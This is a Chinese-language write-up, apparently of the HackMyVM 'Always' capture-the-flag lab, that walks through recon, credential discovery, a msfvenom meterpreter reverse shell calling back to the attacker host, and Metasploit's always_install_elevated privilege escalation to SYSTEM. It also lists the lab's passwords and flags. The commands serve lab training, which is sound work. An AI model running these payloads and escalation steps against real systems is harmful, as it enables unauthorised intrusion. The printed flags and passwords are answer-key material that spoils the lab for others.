HackMyVM-Always靶机的测试报告
目录
一、测试环境
1、系统环境
2、使用工具/软件
二、测试目的
三、操作过程
1、信息搜集
2、Getshell
3、提权
四、结论
一、测试环境
1、系统环境
渗透机:kali2021.1(192.168.101.127)
靶 机:win7(192.168.101.246)
注意事项:
①该类型靶场只能在virtualBox上搭建,因此将靶机设置为桥接网络,方便进行渗透。攻击机kali也要桥接出来,不然会出问题。
②靶机启动失败:设置中取消勾选usb即可
2、使用工具/软件
Kali: arp-scan(主机探测)、nmap(端口和服务探测)、gobuster(目录扫描)、ftp(登录ftp)、msfvenom(生成反连木马)、msfconsole(漏洞利用)
测试网址:http://192.168.101.246:8080
靶场介绍:由国外大佬搭建的靶场,类似于vulnhub,经常更新,需要翻墙才能进。
地址:https://hackmyvm.eu/machines/machine.php?vm=Always
二、测试目的
基于渗透测试流程测试该Windows靶机,拿到密码信息,提权到system权限拿到两个flag。
三、操作过程
1、信息搜集
主机探测
arp-scan -l
可以看到靶机IP:192.168.101.246
端口和服务探测
nmap -sT -A -p- -T4 192.168.101.246
可以看到开启了很多端口:21、135、139、445、3389、5357、8080
目录扫描
gobuster dir -u http://192.168.101.246:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt
扫到一个主页和后台
查看后台主页的源码,使用前端验证,而且直接将用户名和密码暴露了
admin/adminpass123
2、Getshell
登录后台,进去是一串base64加密的密文
ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=
解密得到:ftpuser:KeepGoingBro!!!
这是ftp的用户名和密码,ftpuser是用户名:
ftpuser/KeepGoingBro!!!
登录ftp,有一个robots.txt文件可以下载
ftp 192.168.101.246
get robots.txt
查看robots.txt文件,发现一个新的文件地址:/admins-secret-pagexxx.html
cat robots.txt
进入该网页,是一个备份笔记
提示了always用户和密码,解密得到如下密码:
always/YouCantFindMe.!.!
根据靶机开启了3389端口,尝试远程登录
但是没always用户登录失败
看到ftpuser用户,尝试登录,也不让远程登录
这里没找到其他方法,直接登录靶机上传shell吧(近源攻击)
Msfvenom生成反弹shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.101.127 lport=6000 -f exe -o test.exe
开启监听,并在靶机执行exe文件
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.101.127
set lport 6000
run
3、提权
使用msf插件自动寻找Windows提权方法
bg
use multi/recon/local_exploit_suggester
set session 1
run
查找到了14个可利用的exp
使用第一个模块即可提权system权限
use exploit/windows/local/always_install_elevated
set lhost 192.168.101.127
set session 1
run
进入cmd,在Always用户的桌面找到
user.txt:HMV{You_Found_Me!}
cd c:/Users/Always/Desktop
type user.txt
在administrator用户的桌面找到
root.txt:HMV{White_Flag_Raised}
cd c:/Users/Administrator/Desktop
dir
type root.txt
四、结论
靶机开放了很多服务,并且没做防护,可以很轻松拿到密码,并且得到system权限。